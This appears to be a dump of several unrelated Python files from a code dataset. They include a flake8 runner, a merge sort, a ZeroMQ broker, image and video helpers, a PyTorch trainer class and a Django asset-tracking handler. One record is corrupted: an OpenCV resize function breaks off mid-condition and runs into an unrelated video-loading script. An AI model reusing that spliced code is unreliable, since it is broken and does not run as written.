files.\n\nOn windows, the following .bat file runs this file::\n python flake8-leo.py %*\n\nOn Ubuntu, the following alias runs this file::\n pyflake=\"python pyflake-leo.py\"\n\"\"\"\n#@@language python\n#@@tabwidth -4\n# pylint: disable=invalid-name\n # flake8-leo isn't a valid module name, but it isn't a module.\nimport leo.core.leoGlobals as g\nimport leo.core.leoTest as leoTest\nimport optparse\nimport os\nimport time\n\n#@+others\n#@+node:ekr.20160517182239.10: ** main & helpers\ndef main(files):\n \"\"\"Call run on all tables in tables_table.\"\"\"\n try:\n from flake8 import engine\n except Exception:\n print(f'{g.shortFileName(__file__)}: can not import flake8')\n return\n config_file = get_flake8_config()\n if config_file:\n style = engine.get_style_guide(parse_argv=False, config_file=config_file)\n t1 = time.time()\n check_all(files, style)\n t2 = time.time()\n n = len(files)\n print('%s file%s, time: %5.2f sec.' % (n, g.plural(n), t2 - t1))\n#@+node:ekr.20160517222900.1: *3* get_home\ndef get_home():\n \"\"\"Returns the user's home directory.\"\"\"\n home = g.os_path_expanduser(\"~\")\n # Windows searches the HOME, HOMEPATH and HOMEDRIVE\n # environment vars, then gives up.\n if home and len(home) > 1 and home[0] == '%' and home[-1] == '%':\n # Get the indirect reference to the true home.\n home = os.getenv(home[1:-1], default=None)\n if home:\n # Important: This returns the _working_ directory if home is None!\n # This was the source of the 4.3 .leoID.txt problems.\n home = g.os_path_finalize(home)\n if not g.os_path_exists(home) or not g.os_path_isdir(home):\n home = None\n return home\n#@+node:ekr.20160517222236.1: *3* get_flake8_config\ndef get_flake8_config():\n \"\"\"Return the path to the flake8 configuration file.\"\"\"\n join = g.os_path_finalize_join\n homeDir = get_home()\n loadDir = g.os_path_finalize_join(g.__file__, '..', '..')\n base_table = ('flake8', 'flake8.txt')\n dir_table = (\n homeDir,\n join(homeDir, '.leo'),\n join(loadDir, '..', '..', 'leo', 'test'),\n )\n for base in base_table:\n for path in dir_table:\n fn = g.os_path_abspath(join(path, base))\n if g.os_path_exists(fn):\n return fn\n print('no flake8 configuration file found in\\n%s' % ('\\n'.join(dir_table)))\n return None\n#@+node:ekr.20160517222332.1: *3* check_all\ndef check_all(files, style):\n \"\"\"Run flake8 on all paths.\"\"\"\n from flake8 import main\n\n report = style.check_files(paths=files)\n main.print_report(report, style)\n#@+node:ekr.20160517182239.11: ** report_version\ndef report_version():\n try:\n import flake8\n\n print('flake8 version: %s' % flake8.__version__)\n except ImportError:\n g.trace('can not import flake8')\n#@+node:ekr.20160517182239.15: ** scanOptions\ndef scanOptions():\n \"\"\"Handle all options, remove them from sys.argv.\"\"\"\n global g_option_fn\n # This automatically implements the -h (--help) option.\n parser = optparse.OptionParser()\n add = parser.add_option\n add('-a', action='store_true', help='all')\n add('-c', action='store_true', help='core')\n add('-e', action='store_true', help='external')\n add('-f', dest='filename', help='filename, relative to leo folder')\n add('-g', action='store_true', help='gui plugins')\n add('-m', action='store_true', help='modes')\n add('-p', action='store_true', help='plugins')\n # add('-s', action='store_true', help='silent')\n add('-u', action='store_true', help='user commands')\n add('-v', '--version', dest='v', action='store_true', help='report flake8 version')\n # Parse the options.\n options, args = parser.parse_args()\n # silent = options.s\n if options.a:\n scope = 'all'\n elif options.c:\n scope = 'core'\n elif options.e:\n scope = 'external'\n elif options.filename:\n fn = options.filename\n if fn.startswith('='):\n fn = fn[1:]\n g_option_fn = fn.strip('\"')\n scope = 'file'\n elif options.g:\n scope = 'gui'\n elif options.m:\n scope = 'modes'\n elif options.p:\n scope = 'plugins'\n # elif options.s: scope = 'silent'\n elif options.u:\n scope = 'commands'\n elif options.v:\n scope = 'version'\n else:\n scope = 'all'\n return scope\n#@-others\ng_option_fn = None\nscope = scanOptions()\nif scope == 'version':\n report_version()\nelse:\n files = leoTest.LinterTable().get_files_for_scope(scope, fn=g_option_fn)\n main(files)\n#@-leo\n","sub_path":"flake8-leo.py","file_name":"flake8-leo.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"272936686","text":"#!/usr/bin/python\r\n\r\nfrom math import *\r\n\r\ndef _merge(a, p, q, r):\r\n s = []\r\n u = p\r\n v = q + 1\r\n while u <= q and v <= r:\r\n if a[u] <= a[v]:\r\n s.append(a[u])\r\n u = u + 1\r\n else:\r\n s.append(a[v])\r\n v = v + 1\r\n if v > r:\r\n for i in range(u, q + 1):\r\n s.append(a[i])\r\n else:\r\n for i in range(v, r + 1):\r\n s.append(a[i]) \r\n a[p:r + 1] = s[:]\r\n \r\ndef merge_sort(a, p, r):\r\n if p < r:\r\n q = int(floor((p + r)/2))\r\n merge_sort(a, p, q)\r\n merge_sort(a, q + 1, r)\r\n _merge(a, p, q, r)","sub_path":"sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"123156133","text":"from multiprocessing import Process, Queue\nimport json\nimport zmq\n\ndef ClientJSONRouter(addr, queue):\n \"\"\"\n Broker endpoint for django client\n \"\"\"\n context = zmq.Context()\n socket = context.socket(zmq.ROUTER)\n socket.bind(addr)\n while True:\n msg = []\n msg.append(socket.recv())\n msg.append(socket.recv())\n msg.append(socket.recv_json())\n msg[2] = json.loads(msg[2])\n try:\n queue.put(msg[2].get('token'))\n socket.send_multipart(\n (msg[0], msg[1], json.dumps({\"code\": 201}).encode('utf-8'))\n )\n except Exception as e:\n print(e)\n socket.send_multipart(\n (msg[0], msg[1], json.dumps({\"code\": 400}).encode('utf-8'))\n )\n \ndef WorkerJSONRouter(addr, queue):\n \"\"\"\n Broker endpoint for workgroups\n \"\"\"\n context = zmq.Context()\n socket = context.socket(zmq.ROUTER)\n socket.bind(addr)\n while True:\n msg = []\n msg.append(socket.recv())\n msg.append(socket.recv())\n msg.append(socket.recv_json())\n try:\n token = queue.get(block=False)\n socket.send_multipart(\n (\n msg[0], \n msg[1], \n json.dumps({\"token\": token, \"code\": 200}).encode('utf-8')\n )\n )\n except:\n socket.send_multipart(\n (\n msg[0],\n msg[1],\n json.dumps({\"token\": \"\",\"code\": 204}).encode('utf-8')\n )\n )\n\ndef JSONBroker(addr1, addr2):\n message_queue = Queue()\n Process(target=ClientJSONRouter, args=(addr1, message_queue,)).start()\n Process(target=WorkerJSONRouter, args=(addr2, message_queue,)).start()\n \nif __name__ == \"__main__\":\n JSONBroker(\"tcp://127.0.0.1:30000\",\"tcp://127.0.0.1:30001\")\n\n","sub_path":"analysis/broker_job.py","file_name":"broker_job.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"455473803","text":"from PIL import Image\nimport numpy as np\n\n# Deprecated\ndef calculate_new_positions(x, y, radius):\n factor = radius\n return {\n 'top': [x ,y -radius],\n 'bottom': [x, y + radius],\n 'left': [x - radius, y],\n 'right': [x + radius, y],\n 'top_left': [x -radius, y-radius],\n 'bottom_left': [x-radius, y+radius],\n 'top_right': [x+radius,y-radius],\n 'bottom_right': [x+radius,y+radius]\n }\n\n\ndef extract_submatrix(x, y, height, width, image_data, radius, weight):\n x_min = x - radius\n # The plus one (+1) is to also include the last element\n x_max = x + radius + 1\n y_min = y - radius\n y_max = y + radius + 1\n\n # Boundary conditions\n if x_min < 0:\n x_min = 0\n elif x_max > width:\n x_max = width - 1\n if y_min < 0:\n y_min = 0\n elif y_max > height:\n y_max = height - 1\n\n # Multiplies the center pixel by the weight\n image_data[y][x] = image_data[y][x]*weight\n\n submatrix = image_data[y_min:y_max, x_min:x_max]\n height, width, last = submatrix.shape\n\n return submatrix, height, width\n\n\ndef save_new_image(data, name):\n im2 = Image.fromarray(data.astype('uint8'))\n im2.save(name)\n\n\ndef open_image(image):\n try:\n img = Image.open(image)\n img = img.convert('RGBA')\n width, height = img.size\n except :\n exit('Por favor, informe uma imagem válida.')\n\n return img, width, height\n\n\ndef get_image_data(image):\n return np.array(image).astype('int64')\n\n\ndef calculate_new_color(image_data, weight, height, width):\n rgba_sum = np.sum(image_data, axis=(1, 0))\n\n denominator = (height * width - 1) + weight\n\n new_color = np.round(rgba_sum / denominator)\n\n return new_color\n\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"123651794","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/6/22 20:57\n# @Author : Li Jiawei\n# @FileName: imagesPreprocessing.py\n# @Software: PyCharm\n\nimport cv2\nimport os\nimport numpy as np\n\nIMAGE_SIZE=64\n\ndef resize_image(image,height=IMAGE_SIZE,width=IMAGE_SIZE):\n top,bottom,left,right=(0,0,0,0)\n\n h,w,_=image.shape\n\n longest_edge=max(h,w)\n\n if h32:\n\n buffer = np.empty((16,80,100, 3), np.dtype('float32'))\n count = 0\n retaining = True\n j=0\n while (count < frame_count and retaining and j<16):\n retaining, frame = capture.read()\n if count == sample[j]:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n buffer[j] = frame\n j+=1\n count += 1\n \n buffer = buffer.transpose((3, 0, 1, 2)) \n buffer = (buffer - 128)/128\n dataset[c].append(buffer)\n for c in commands:\n np.save(os.path.join(tr_path,c)+\".npy\",np.stack(dataset[c])[:-10])\n np.save(os.path.join(ts_path,c)+\".npy\",np.stack(dataset[c])[-10:])\nif __name__ == \"__main__\":\n commands = [\"black\",\"cancel\",\"centeralign\",\"copy\",\"large\",\"medium\",\"newslide\",\"paste\",\"red\",\"textbox\"]\n data_prep(hp.data.dataset,hp.data.train_path,hp.data.test_path)\n\n","sub_path":"data_prepare.py","file_name":"data_prepare.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"246939953","text":"import torch\nimport warnings\nimport torch.nn as nn\nimport torch.optim as optim\nfrom . import lr_scheduler\nimport inspect\nfrom inspect import Signature, Parameter\nfrom collections import OrderedDict\nfrom copy import copy\nfrom typing import Tuple, List, Union, Type, Any, Dict\nfrom tqdm import tqdm\n\nimport vortex.utils.type_utils as type_utils\nfrom vortex.utils.logger.base_logger import ExperimentLogger\n\nclass BaseTrainer(object):\n __loss_parameters__ = ['input', 'target']\n def __init__(self, model: Type[nn.Module], optimizer: Union[Type[optim.Optimizer], Tuple[str, Dict], Dict[str,Any]], \n scheduler: Union[Type[optim.lr_scheduler._LRScheduler], Tuple[str, Dict[str, Any], Dict[str,Any]]], \n criterion: Type[nn.Module], experiment_logger : Union[Type[ExperimentLogger],None] = None,check_annotations: bool = True):\n\n self.model = model\n self.optimizer = type(self).create_optimizer(optimizer, self.model)\n self.scheduler = type(self).create_scheduler(scheduler, self.optimizer)\n self.criterion = criterion\n self.experiment_logger = experiment_logger\n self.global_step = 0\n\n self._check_model()\n \n def _check_model(self, strict=False, check_annotations=True):\n \"\"\"\n check model and loss, called after model, loss, optim, scheduler are assigned\n can be bypassed from derived class by overriding this method\n strict mode can be set from derived class by overriding this method and \n pass strict=True\n \"\"\"\n model_signature = inspect.signature(self.model.forward)\n loss_signature = inspect.signature(self.criterion.forward)\n criterion_args = type(self).__loss_parameters__\n\n ## force loss fn signature has parameter named 'input' and 'targets'\n args_exist = all(arg in loss_signature.parameters for arg in criterion_args)\n model_return_anno = model_signature.return_annotation\n args_not_exist_msg = \"loss function {} does not have {} args\".format(\n type(self.criterion), ', '.join(criterion_args)\n )\n ## assuming first name of loss param is input name\n loss_input_name = criterion_args[0]\n loss_input_anno = loss_signature.parameters[loss_input_name].annotation \\\n if loss_input_name in loss_signature.parameters else None\n anno_mismatch_msg = \"model return annotation does not match with loss input annotation, \\\n {model_anno} with {loss_anno}\".format_map(dict(\n model_anno=model_return_anno,\n loss_anno=loss_input_anno,\n ))\n def raise_error(cond, msg, exc=TypeError):\n if not cond:\n raise exc(msg)\n def emit_warning(cond, msg):\n if not cond:\n warnings.warn(msg)\n warn_or_error = raise_error if strict else emit_warning\n warn_or_error(args_exist,args_not_exist_msg)\n if not check_annotations:\n return\n return_type_annotated = model_return_anno != Signature.empty\n loss_input_annotated = loss_input_anno is not None\n warn_or_error(return_type_annotated, \"return type not annotated\")\n warn_or_error(loss_input_annotated, \"loss input not annotated\")\n match = return_type_annotated and loss_input_annotated and type_utils.match_annotation(model_return_anno,loss_input_anno)\n warn_or_error(match, \"annotation mismatch\")\n \n \n @staticmethod\n def create_optimizer(optimizer: Union[optim.Optimizer, tuple, dict], model: Type[nn.Module]):\n \"\"\"\n create optimizer\n \"\"\"\n if isinstance(optimizer, tuple):\n warnings.warn(\"creating optimizer from tuple is deprecated\", PendingDeprecationWarning)\n assert (len(optimizer) == 2), \"expect length of optimizer is 2 if type of tuple\"\n assert isinstance(optimizer[0], str), \"expect optimizer is type of Tuple[str,Dict], got optimizer[0] : %s\" % (\n type(optimizer[0]))\n assert isinstance(optimizer[1], dict), \"expect optimizer is type of Tuple[str,Dict], got optimizer[0] : %s\" % (\n type(optimizer[1]))\n optimizer = dict(\n module=optimizer[0],\n args=optimizer[1],\n )\n if isinstance(optimizer, dict):\n if 'method' in optimizer and not 'module' in optimizer:\n optimizer.update({'module': optimizer['method']})\n opt_method, kwargs = optimizer['module'], optimizer['args']\n if opt_method.startswith('optim.'):\n opt_method = opt_method.replace('optim.','')\n assert hasattr(optim, opt_method), \\\n \"unsupported optimizer {}\".format(opt_method)\n kwargs.update({'params' : model.parameters()})\n optimizer = getattr(optim, opt_method)(**kwargs)\n return optimizer\n\n @staticmethod\n def create_scheduler(scheduler, optimizer):\n \"\"\"\n create scheduler\n \"\"\"\n if isinstance(scheduler, tuple):\n warnings.warn(\"creating scheduler from tuple is deprecated\", PendingDeprecationWarning)\n if scheduler[0] is None:\n return None\n assert len(scheduler) == 2, \"expect lenth of scheduler is 2 if type of tuple\"\n assert isinstance(scheduler[0], str), \"expect scheduler is type of Tuple[str,Dict], got scheduler[0] : %s\" % (\n type(scheduler[0]))\n assert isinstance(scheduler[1], dict), \"expect scheduler is type of Tuple[str,Dict], got scheduler[1] : %s\" % (\n type(scheduler[1]))\n scheduler = dict(\n module=scheduler[0],\n args=scheduler[1],\n )\n if isinstance(scheduler, dict):\n if 'method' in scheduler and not 'module' in scheduler:\n scheduler.update({'module': scheduler['method']})\n sch_method, kwargs = scheduler['module'], scheduler['args']\n assert hasattr(lr_scheduler, sch_method), \\\n \"unsupported lr_scheduler {}\".format(sch_method)\n kwargs.update({'optimizer': optimizer})\n scheduler = getattr(lr_scheduler, sch_method)(**kwargs)\n return scheduler\n\n def train(self, dataloader, epoch: int):\n raise NotImplementedError\n \n def __call__(self, dataloader, epoch: int):\n is_training = self.model.training\n self.model.train()\n train_results = self.train(dataloader, epoch)\n self.model.train(is_training)\n return train_results","sub_path":"vortex/core/engine/trainer/base_trainer.py","file_name":"base_trainer.py","file_ext":"py","file_size_in_byte":6589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"457698960","text":"import time\n\ndef test_basket_button(browser):\n browser.get('http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/')\n time.sleep(10)\n basket_button = browser.find_elements_by_css_selector(\".btn-add-to-basket\")\n result = False\n if len(basket_button) == 1:\n result = True\n assert result, \"А где же кнопочка??? Или их так много...\"\n","sub_path":"selenium_course/test_imarket/test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"652128159","text":"'''import requests\n\nurl = \"https://thevirustracker.com/free-api?global=stats\"\n\npayload = {}\nheaders= {}\n\nresponse = requests.request(\"GET\", url, headers=headers, data = payload)\n\nsachin = response.text.encode('utf8')\n\n\ndata = open('file.txt','w')\ndata.write(str(sachin))\ndata.close()'''\n\n\n# load text\nfile = open('file.txt', 'rt')\ntext = file.read()\nfile.close()\n# split based on words only\nimport re\nwords = re.split(r'\\W+', text)\n#-----this is for total cases----\ntotal_cases = words.index('total_cases')+1\nprint('total_cases',words[total_cases])\n\n#------this is for total_recovered\n\ntotal_recovered = words.index('total_recovered')+1\nprint('total_recovered',words[total_recovered])\n\n#------this is for the total_deaths\n\ntotal_deaths = words.index('total_deaths')+1\nprint('total_deaths',words[total_deaths])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"sachin.py","file_name":"sachin.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"583778048","text":"'''\r\nstatus:\r\n200 成功全部录入\r\n300 id号没有,新增ID号,需要客户端录入id号\r\n301 新资产,正在等待管理员录入\r\n401 字段错误\r\n403 其他错误\r\n'''\r\nimport json\r\nfrom asset import models\r\n\r\nfrom utils.tools import JsonRet\r\n\r\n\r\nclass AssetFactory(object):\r\n def __init__(self,request):\r\n self.request=request\r\n self.response=JsonRet()\r\n self.madatory_field=[\"asset_id\",\"asset_type\",\"sn\"]\r\n self.waiting_approval=False\r\n self.clean_data=None\r\n\r\n\r\n # ['cpu', 'asset_type', 'os_type', 'manufacturer', 'nic', 'sn', 'ram', 'disk']\r\n\r\n def madatory_check(self,data):\r\n '''\r\n 1,检查字段是否合法\r\n 2,用id和sn判断数据库是否匹配\r\n 3,没匹配是新资产,返回False,匹配返回True\r\n '''\r\n try:\r\n for field in self.madatory_field:\r\n if field not in data:\r\n\r\n raise ValueError(\"the [%s] field is not found\" % (field))\r\n except ValueError as e:\r\n self.response.info_error(401,e.args)\r\n return False\r\n\r\n if not data.get(\"asset_id\"): # 单纯的新资产\r\n\r\n try:\r\n self.asset_obj = models.Asset.objects.get(sn=data[\"sn\"])\r\n except models.models.ObjectDoesNotExist as e: #新资产\r\n self.waiting_approval = True\r\n self.response.info_error(301, \"资产等待录入\")\r\n else: #老资产,id丢了;新资产,已经通过审核 data[\"asset_id\"] = self.asset_obj.id\r\n data[\"asset_id\"]=self.asset_obj.id\r\n self.response.info_data(201, {\"asset_id\": self.asset_obj.id})\r\n\r\n else: #我有资产id,这个id是不是假的先用sn判断,如果sn是真的,是老资产,如果sn不是真的,\r\n # 在asset_id为真的情况下说明是换主板了,如果id也是假的,说明是新资产\r\n try:\r\n self.asset_obj = models.Asset.objects.get(sn=data[\"sn\"])\r\n except models.models.ObjectDoesNotExist as e:\r\n try:\r\n self.asset_obj = models.Asset.objects.get(id=data[\"asset_id\"])\r\n except models.models.ObjectDoesNotExist as e: #新资产\r\n self.response.info_error(301, \"资产等待录入\")\r\n self.clean_data = data\r\n self.save_new_asset_approval()\r\n\r\n else: #换主板了\r\n self.response.info_error(202, \"数据更新提示\")\r\n\r\n else:#有该资产,直接修改\r\n data[\"asset_id\"]=self.asset_obj.id\r\n self.response.status=201\r\n self.response.data={\"asset_id\": self.asset_obj.id}\r\n self.response.error=\"直接修改\"\r\n\r\n\r\n\r\n def get_asset_id_by_sn(self):\r\n #如果asset_id没有\r\n asset_data=self.request.POST.get(\"asset_data\")\r\n\r\n asset_data=json.loads(asset_data)\r\n\r\n self.madatory_check(asset_data)\r\n\r\n if self.response.status==301:\r\n if self.waiting_approval:\r\n self.clean_data=asset_data\r\n self.save_new_asset_approval()\r\n\r\n\r\n\r\n def save_new_asset_approval(self):\r\n # try:\r\n #如果new_asset中有相同的sn,就不用再添加\r\n try:\r\n repeat=models.NewAssetApprovalZone.objects.filter(sn=self.clean_data.get(\"sn\"))\r\n if not repeat.first():\r\n models.NewAssetApprovalZone.objects.get_or_create(asset_type=self.clean_data.get(\"asset_type\"),\r\n sn=self.clean_data.get(\"sn\"),\r\n model=self.clean_data.get(\"model\"),\r\n os_type=self.clean_data.get(\"os_type\"),\r\n manufacturer=self.clean_data.get(\"manufacturer\"),\r\n content_data=json.dumps(self.clean_data)\r\n )\r\n except Exception as e:\r\n # 403 录入错误\r\n self.response.info_error(403,e.args)\r\n\r\n\r\n def get_asset_by_sn(self,db_obj=None):\r\n '''找好位置\r\n '''\r\n\r\n data_set={\r\n \"sn\":db_obj.sn,\r\n \"model\":db_obj.model\r\n }\r\n asset_obj,flag=models.Asset.objects.get_or_create(**data_set)\r\n self.asset_obj=asset_obj\r\n return True\r\n\r\n def data_is_valid(self,request):\r\n data=request.POST.get(\"asset_data\")\r\n if data:\r\n try:\r\n data=json.loads(data)\r\n self.madatory_check(data)\r\n if self.response.status == 201:\r\n self.clean_data=data\r\n return True\r\n else:\r\n return False\r\n except Exception as e:\r\n #403 值错误 data数据不符合要求\r\n self.response.info_error(403, \"data数据不符合要求\")\r\n return False\r\n pass\r\n else:\r\n #403 没有资产数据\r\n self.response.info_error(403, \"没有资产数据\")\r\n return False\r\n pass\r\n\r\n pass\r\n\r\n def _is_new_asset(self):\r\n '''\r\n 新资产没有asset_type\r\n :return:\r\n '''\r\n if not self.asset_obj.asset_type:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\n def data_inject(self,data=None):\r\n '''\r\n 注入到数据库,一种是从admin注入,是创建一条资产,admin过来有db_obj,\r\n 如果是更新数据,则是从客户端过来的,就没有db_obj\r\n :param asset_data:\r\n :return:\r\n '''\r\n #如果\r\n if not data: #说明从客户端过来\r\n data = self.request.POST.get(\"asset_data\")\r\n\r\n data=json.loads(data)\r\n self.madatory_check(data)\r\n\r\n if self.response.status >= 200 and self.response.status < 300: #修改\r\n print(self.response.status)\r\n self.response.error=None\r\n self.response.status=0\r\n self.clean_data = data\r\n if self._is_new_asset():\r\n self.create_asset()\r\n else:\r\n self.update_asset()\r\n pass\r\n elif self.response.status == 301:\r\n return False\r\n\r\n\r\n def _field_verify(self,data_set,key,data_type):\r\n #1,必须有值\r\n #2,必须能转换成指定类型\r\n asset_value=data_set.get(key)\r\n\r\n if asset_value:\r\n try:\r\n # print(type(data_set[key]),data_type,type(data_set[key]) is not data_type)\r\n if type(data_set[key]) is not data_type:\r\n data_set[key]=data_type(data_set[key])\r\n\r\n except Exception as e:\r\n # 403 值错误 类型不正确\r\n self.response.info_error(403,\"type[%s] type is error\"%data_set[key])\r\n else:\r\n #403 值错误 没找到值\r\n self.response.info_error(403, \"type[%s] value not required\" % data_set[key])\r\n\r\n def create_asset(self):\r\n try:\r\n func=getattr(self,\"_create_%s\"%self.clean_data[\"asset_type\"])\r\n func()\r\n except Exception as e:\r\n self.response.status = 402\r\n self.response.error = \"可能不支持%s资产\"%self.clean_data[\"asset_type\"]\r\n\r\n return False\r\n\r\n def update_asset(self):\r\n func=None\r\n try:\r\n func=getattr(self,\"_update_%s\"%self.clean_data[\"asset_type\"])\r\n except Exception as e:\r\n self.response.status = 402\r\n self.response.error = \"可能不支持%s资产\"%self.clean_data[\"asset_type\"]\r\n return False\r\n\r\n func()\r\n def _create_server(self):\r\n\r\n try:\r\n self.__create_server_info()\r\n self.__create_cpu_info()\r\n self.__create_ram_info()\r\n self.__create_nic_info()\r\n self.__create_disk_info()\r\n except Exception as e:\r\n pass\r\n else:\r\n models.NewAssetApprovalZone.objects.filter(sn=self.clean_data[\"sn\"]).update(approved=True)\r\n pass\r\n\r\n def _create_networkDevice(self):\r\n pass\r\n\r\n def _update_server(self):\r\n\r\n server=self._update_server_component()\r\n\r\n cpu=self._update_cpu_component()\r\n nic=self._update_asset_component(self.clean_data[\"nic\"],\"networkcard_set\",[\r\n \"ip_address\",\"model\",\"sn\",\"slot\"\r\n ],unique_key=\"mac_address\")\r\n\r\n disk=self._update_asset_component(self.clean_data[\"disk\"],\"disk_set\",[\r\n \"model\",\"manufacturer\",\"capacity\",\"slot\",\"iface_type\"\r\n ],unique_key=\"sn\")\r\n\r\n ram=self._update_asset_component(self.clean_data[\"ram\"],\"ram_set\",[\r\n \"model\",\"manufacturer\",\"capacity\",\"slot\"\r\n ],unique_key=\"sn\")\r\n\r\n\r\n if not self.response.error:\r\n self.response.info_error(200,\"no change\")\r\n\r\n def _update_server_component(self):\r\n updata_fields = [\"os_type\", \"manufacturer\"]\r\n asset_id = self.clean_data.get(\"asset_id\")\r\n obj = models.Server.objects.get(asset_id=asset_id)\r\n server_data = self.clean_data\r\n self.__compare_component(obj, server_data, updata_fields)\r\n pass\r\n def _update_cpu_component(self):\r\n updata_fields=[\"model\",\"cpu_count\",\"cpu_core_count\"]\r\n asset_id=self.clean_data.get(\"asset_id\")\r\n obj=models.CPU.objects.get(asset_id=asset_id)\r\n cpu_data=self.clean_data.get(\"cpu\")\r\n self.__compare_component(obj,cpu_data,updata_fields)\r\n\r\n\r\n\r\n\r\n def _update_asset_component(self,data_source,asset_fk,update_field,unique_key):\r\n #零件是列表的都放这里\r\n\r\n try:\r\n fk=getattr(self.asset_obj,asset_fk)\r\n except AttributeError as e:\r\n self.response.info_error(403, \"没有该外键[%s]\" % asset_fk)\r\n return False\r\n\r\n try:\r\n obj_list=getattr(fk,\"all\")() #[obj1,obj2]\r\n except AttributeError as e:\r\n self.response.info_error(403, \"[%s]不是外键\" % asset_fk)\r\n return False\r\n\r\n for obj in obj_list:\r\n obj_unique_field=getattr(obj,unique_key)#server unique value\r\n\r\n # if type(data_source) is list: # 如果客户端是以字典传过来,就得判断,这是公司不规范导致的代码量\r\n for data_dict in data_source:\r\n data_unique_field=data_dict.get(unique_key) #cliend unique value\r\n if data_unique_field == obj_unique_field:\r\n self.__compare_component(obj,data_dict,update_field)\r\n\r\n model_name=fk.model._meta.object_name.lower()\r\n self.add_or_del_component(component_name=model_name,\r\n client_data_list=data_source,\r\n db_data_list=obj_list,\r\n identify_field=unique_key)\r\n\r\n pass\r\n\r\n def __compare_component(self,model_obj,data_source,update_fields):\r\n '''\r\n 根据update_field来修改内容,转换data的类型\r\n :param model_obj:\r\n :param data_source:\r\n :param update_field:\r\n :return:\r\n '''\r\n for field in update_fields:\r\n model_field=getattr(model_obj,field)\r\n data_field=data_source.get(field)\r\n if data_field != None:\r\n if type(model_field) is int:\r\n data_field=int(data_field)\r\n elif type(model_field) is float:\r\n data_field = float(data_field)\r\n elif type(model_field) is str:\r\n data_field = str(data_field)\r\n\r\n from time import timezone\r\n if model_field == data_field:\r\n #没有变化\r\n pass\r\n else:\r\n db_field = model_obj._meta.get_field(field) # 找到该对象的字段\r\n db_field.save_form_data(model_obj, data_field) # 更新字段\r\n\r\n model_obj.update_date = 2 # 添加更新时间\r\n model_obj.save() # 保存\r\n\r\n # 记录哪个资产的哪个零件的哪条记录,从什么变成了什么\r\n event_msg=\"asset[%s]--->component[%s]--->field[%s],from[%s]to [%s]\"%(\r\n self.asset_obj,model_obj,field,model_field,data_field\r\n )\r\n self.response.info_error(200,event_msg)\r\n log_handler(self.asset_obj,'FieldChanged', self.request.user, event_msg, model_obj)\r\n else:\r\n #哪个零件的哪条字段没有\r\n self.response.info_error(403,\"asset[%s]---component[%s]---field[%s] is empty\"%(self.asset_obj,model_obj,field))\r\n\r\n\r\n def add_or_del_component(self,component_name,client_data_list,db_data_list,identify_field):\r\n #xxx(\"nic\",[nic1,nic2],[obj1,obj2],\"mac_address\")\r\n\r\n unique_data_list=set([data[identify_field] for data in client_data_list])\r\n unique_db_list=set(getattr(obj,identify_field) for obj in db_data_list)\r\n aa=unique_data_list-unique_db_list #客户端多出来的,add\r\n bb=unique_db_list-unique_data_list #数据库多出来的,del\r\n print(\"1--\", self.response.error)\r\n for data in client_data_list:\r\n for a_item in aa:\r\n if a_item == data[identify_field]:\r\n obj = getattr(self.asset_obj, \"%s_set\" % component_name.lower())\r\n\r\n\r\n try:\r\n\r\n obj.create(**data)\r\n\r\n event_msg=\"asset[%s]---component[%s] add a row[%s],success\\n\"%(\r\n self.asset_obj,obj,data[identify_field]\r\n )\r\n\r\n log_handler(self.asset_obj,\"NewComponentAdded\",self.request.user,detail=event_msg,component=obj)\r\n self.response.status=301\r\n self.response.error=\"\"\r\n self.response.error+=event_msg\r\n except Exception as e:\r\n self.response.status = 403\r\n\r\n event_msg_error = e.args\r\n self.response.error = event_msg_error\r\n return False\r\n\r\n for obj in db_data_list:\r\n for b_item in bb:\r\n if b_item == getattr(obj,identify_field):\r\n check_obj = getattr(self.asset_obj, \"%s_set\" % component_name.lower()).filter(\r\n **{identify_field: b_item})\r\n try:\r\n check_obj.delete()\r\n event_msg=\"asset[%s]---component[%s] delete a row[%s]\\n\"%(\r\n self.asset_obj,check_obj,b_item\r\n )\r\n log_handler(self.asset_obj,\"NewComponentAdded\",self.request.user,detail=event_msg,component=check_obj)\r\n self.response.status = 301\r\n self.response.error += event_msg\r\n except Exception as e:\r\n self.response.status = 403\r\n event_msg_error = e.args\r\n self.response.error = event_msg_error\r\n return False\r\n print(\"3--\", self.response.error)\r\n def _update_networkDevice(self):\r\n pass\r\n\r\n\r\n def __create_server_info(self):\r\n '''\r\n 1,创建资产\r\n 2,创建服务器\r\n :return:\r\n '''\r\n #判断必须的每条是否都有,错误信息存放在self.response中\r\n\r\n self._field_verify(self.clean_data,\"asset_type\",str)\r\n\r\n if not self.response.error: # 前面所有,只要有错误,就不往下执行\r\n try:\r\n\r\n asset_dict={\r\n \"asset_type\":self.clean_data[\"asset_type\"]\r\n }\r\n\r\n obj=models.Asset.objects.filter(id=self.clean_data[\"asset_id\"])\r\n\r\n obj.update(**asset_dict)\r\n self._field_verify(self.clean_data, \"asset_id\", int)\r\n server_dict={\r\n \"asset_id\":self.clean_data[\"asset_id\"],\r\n \"os_type\":self.clean_data[\"os_type\"],\r\n \"manufacturer\":self.clean_data[\"manufacturer\"]\r\n }\r\n\r\n obj=models.Server.objects.get_or_create(**server_dict)\r\n except Exception as e:\r\n #403 入数据库错误\r\n self.response.info_error(403,e.args)\r\n\r\n def 